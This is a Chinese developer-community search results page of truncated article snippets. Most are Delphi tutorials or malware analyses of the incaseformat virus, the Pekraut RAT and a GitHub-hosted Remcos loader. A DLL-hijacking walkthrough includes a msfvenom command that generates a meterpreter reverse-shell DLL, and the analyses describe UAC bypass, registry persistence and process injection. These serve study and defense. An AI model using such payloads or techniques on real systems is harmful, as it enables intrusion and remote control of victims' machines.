首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Delphi入门教程

:[SQL Explorer]:SQL数据库的管理工具 :[Register Now]:注册Delphi6 :[BDE Administrator]:Borland数据库引擎的管理工具...【Save As】:当前文件另存为其他文件 7.【Sava Project As】:当前整个项目另存为其他的项目文件 8.【Save All】:保存所有文件 9....【Print】:打印当前文件或者窗体 13:【Exit】:退出整个Delphi6集成开发环境 一个新的应用程序【New】/【Application】开始,通过【Open Object】菜单可以打开一个已经存在的项目...【Add to Project】:各种Delphi6支持的文件加入当前项目 【Remove from Project】:指定的文件项目中移走 【View Source】:查看项目文件的源代码 【Compile...】:编译当前的项目 【Buile】:当前项目制作成可执行文件

6.6K20
您找到你想要的搜索结果了吗?
是的
没有找到

delphi vcl_delphi数据类型

TImage组件能够在窗体放置图像,可以磁盘上选择这个图像文件。 TBevel提供了一个更美观的窗体。 TStringGrid和TDrawGrid类提供了一种表示网格信息的方法。...2、Win32自定义控件类 VCL有一种组件类,它们封装了很多Windows32位的自定义控件,这些包括TListView,TTreeView,TTrackBar,TProgressBar,TTabControl...4、通用对话类 毫无疑问,Windows用通用对话框来处理诸如打开文件、保存文件、选择字体、选择颜色等事情。...例如,TIniFile可以方便地使用Windows配置文件读和写(.INI文件),一般常识是在外面用.INI文件,在内部用Registry注册表,为了使用注册表方便,VCL提供了TRegistry和TRegkeyInfo...,或文件中加载字符串列表,TStringList也可以用来读写文本文件

2.7K10

一文 读懂 还原 破解 incaseformat病毒

病毒文件强制修改的文件隐藏属性恢复回来,建议直接文件夹选项上去修改就好,简单便捷,注册表修改的话比较繁琐。...控件相关信息 (以上工具可以自行到网上进行下载) 对病毒进行查壳 操作方法:可以病毒文件直接拖进Exeinfo.exe工具也可以选择用打开方式病毒文件加载起来。...逆向还原病毒样本具体功能 4.1 逆向的要点:逆向delphi程序一般控件及事件进行作为逆向的突破口进行分析,在IDA中结合样本中的字符串信息以及样本中所加载的导入表中的相关函数信息进行做分析。...*)System::__linkproc__ LStrToPChar(v32);// 类型转换 CopyFileA(v2, "C:\\windows\\tsay.exe", -1);// 病毒文件拷贝复制...0);// 病毒文件拷贝复制c:\\windows\\tsay.exe __writefsdword(0, v14); v16 = &savedregs; v15 = &loc_44F20F

1.1K114

一文 读懂 还原 破解 incaseformat病毒

病毒文件强制修改的文件隐藏属性恢复回来,建议直接文件夹选项上去修改就好,简单便捷,注册表修改的话比较繁琐。...控件相关信息 (以上工具可以自行到网上进行下载) 对病毒进行查壳 操作方法:可以病毒文件直接拖进Exeinfo.exe工具也可以选择用打开方式病毒文件加载起来。...逆向还原病毒样本具体功能 4.1 逆向的要点:逆向delphi程序一般控件及事件进行作为逆向的突破口进行分析,在IDA中结合样本中的字符串信息以及样本中所加载的导入表中的相关函数信息进行做分析。...*)System::__linkproc__ LStrToPChar(v32);// 类型转换 CopyFileA(v2, "C:\\windows\\tsay.exe", -1);// 病毒文件拷贝复制...0);// 病毒文件拷贝复制c:\\windows\\tsay.exe __writefsdword(0, v14); v16 = &savedregs; v15 = &loc_44F20F

97620

Pekraut:新的RAT木马来袭,功能丰富

URL 下载文件 file_info 文件文件名、扩展名、大小、创建日期、上次访问、只读属性发送回 C&C 服务器 file_list 文件夹的所有文件文件夹名称发送到 C&C 服务器,列出所有可用驱动器...file_send 文件发送到 C&C 服务器 exploit_admin_win10 使用 Windows 10 UAC Bypass 以管理员权限启动给定程序 pc_cmd 通过 cmd.exe...这将使该文件常规文件系统中不可见,并且成为系统文件 注册表HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell值默认包含字符串...由于快捷方式位置是硬编码的,所以对于系统不安装在 C 盘的计算机上不起作用 最后,会执行三遍 ping 8.8.8.8.然后删除原始文件并复制%USERPROFILE%\AppData\Roaming\...卸载 注册表键HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell恢复到默认值explorer.exe 删除创建的快捷方式

1.5K10

警惕GitHub恶意病毒项目,持续活跃释放远控木马

.exe" 由 Embarcardero Delphi 编译,是 Inno Setup 的引导程序,其会加载同目录下的 CodeBlock-wallet_v1.3.1-0.bin 进行第二阶段 Payload...,先是定位到固定的 D6C0 位置处,获取文件数据区的正向偏移后开始解密 D6C0 处的内容,解密方式是第 4 位偏移开始,以 DWORD 为单位向前递加,具体细节如下所示: 解密逻辑 解密前后对比...NtWriteVirtualMemory 等 API,下一阶段 shellcode 以远程线程注入到 "C:\Windows\SysWOW64\cmd.exe" 中——先是完整的 pla.dll 写入...,用于执行后续注入: 调用 Ntwrite 函数 解密文件内容 最后创建 "C:\Windows\SysWOW64\explorer.exe" 进程,以同样的方式解密的 EXE 文件以远程线程的方式注入进去...: 创建 explorer 进程 当前进程关系 后门分析: 用于注入 "C:\Windows\SysWOW64\explorer.exe" 进程的 EXE 实际上是一个 Remcos 远控后门,属于 4.9.3

15510

VFP调用Selenium入门篇(一)

Selenium”它最大的贡献就是在于把原来java、c#、python才能玩的东西,VFP同样能搞,因为它支持的浏览器非常多:Chrome、Firefox、Microsoft Edge、Internet Explorer...selenium 通过webdriver协议控制浏览器,那么首先你 得有ChromeDriver,没有自己网下载,官网提供了一些驱动,注意chromedriver的版本一定要与Chrome的版本一致,不然就不起作用...然后我们去下载:https://npm.taobao.org/mirrors/chromedriver/,我下载了52版本相似 直接下载就可以,解压下来是exe文件, 解压下来后,这个exe文件放在你的代码调用的...在VBA工程中需要添加引用SeleniumBasic.tlb(我们VFP主要就是利用VBA来调用它) • RegAsm.bat:用于注册dll,因为释放到你电脑以后,只是把文件放到磁盘上了,要让dll和...因此需要用管理员权限运行该bat文件。 • UnRegAsm.bat:反注册。当你不再需要V3时,用管理员权限运行这个bat,可以注册表中移除写入的内容。相当于软件的卸载。

1.9K30

Hacking Tools搜罗大集合

DeDe:开源的Delphi符号查看器 .NET PEBrowserDbg:快速的.NET动态调试工具 Reflector:最强.NET反编译器 Strong Name Remove:强名称移除工具...,配合插件功能强大 eXeScope:EXE资源编辑器 ResHacker:现代化的EXE资源编辑器 IceSword:冰刀进程管理工具 和 CFF Explorer。...Linux 调试工具 gdb:首选调试器 Windows 逆向分析 PE 文件分析工具 LordPE,ProcDump、PETools 其它工具 COMRaider:ActiveX查看器 Process...出众之处在于其可以直接 lsass.exe 里获取Windows处于Active状态账号明文密码 Fiddler:浏览器抓包分析工具 HttpWatch:以插件的形式内嵌于浏览器中 Wireshark...,外观和使用体验都类似于 IDA DAD:开源 Androiguard 项目的一部分,提供了 DEX 反编译功能以及用于恶意软件分析的许多有趣脚本 Dex2jar: DEX 转换为 JAR 文件从而进行

1.7K91

libzplay库

libzplay目前,非开源,只可以在windows上应用; 关于MP3文件播放:通常步骤是:获取MP3相关参数 -> 解码-> 相关平台播放音频接口播放声音; 可以播放解码播放MP3的库很多,如果VLC...下到的库中说应用说明文档较少,函数注释较少,有些功能靠猜,不过可以通过测试确定,但是功能还是比较强大的,工程中的示例代码较多; 一: libzplay除了可以播放MP3,还可以播放WAV,PCM等音频文件...,其枚举值中可以看到播放的支持类型: This is multimedia library for playing mp3, mp2, mp1, ogg, flac, oga, ac3, aac,...5, sfFLACOgg = 6, sfAC3 = 7, sfAacADTS = 8, sfWaveIn = 9, sfAutodetect = 1000 }; 二: 这里简单将其说明放到这里...All these libraries are standard libraries on all Microsoft Windows.

94520

DLL劫持注入浅析

目录,而所需的DLL文件mylib.dll位于D:\libs目录中,如果D:\libs添加到系统环境变量PATH中,那么无论应用程序在哪个目录中启动,Windows都会加载D:\libs\mylib.dll...运行软件之后可以看到应用程序Notepad++会加载DLL文件——mimiTools.dll 此dll文件在KnownDLLs中无法找到,所以我们可以在Notepad++.exe程序启动时可以应用程序自身所在的目录下调用...id=7777 劫持验证 启动应用程序 使用Process Explorer等类似软件查看该应用程序启动后加载的动态链接库 该应用程序已加载的DLL列表中,查找在KnowsDLLs注册表项不存在的DLL...随后构造恶意DLL文件并劫持的DLL放到该应用程序目录下,重新启动该应用程序,检查是否劫持成功 注入演示 首先使用msfvenom生成dll msfvenom -p windows/x64/meterpreter.../reverse_tcp LHOST=192.168.204.135 LPORT=4444 -f dll >mimiTools.dll 随后打开msf并开启监听 随后生成的dll文件丢到目标主机中并打开

13410

桌面白屏(Active故障)修复批处理

原来,加入 AD 后,域用户的桌面都是网域服务器来配置的,而 Active 桌面就是网域获取的一个叫做 Desktop.htt 的配置文件来控制的,每次用户环境的刷新,都会 AD 服务器重新获取新的配置文件...于是,最开始就有了手动解决的办法,正常用户环境得到正常的文件里面的分辨率修改成目标电脑分辨率并拷贝这个文件去覆盖损坏的 desktop.htt,然后立刻设置为只读属性(否则一刷新就被损坏文件重新覆盖...,网域抓取失败时,生成的错误文件)。...注意事项: 1.由于这个 desktop.htt 文件是设置了壁纸路径的,所以如果你要使用,请将代码中的【C:\windows\web\wallpaper\youjbg.jpg】替换成你电脑的实际图片路径...2.而如果是公司电脑或网吧之类的,可能用的就是统一桌面壁纸了,这时你只要将我这个代码和图片放到一起,然后把 youjpg.jpg 修改成你的图片名称就行了!也可以打包成 exe 文件,更方便!

1.3K60
领券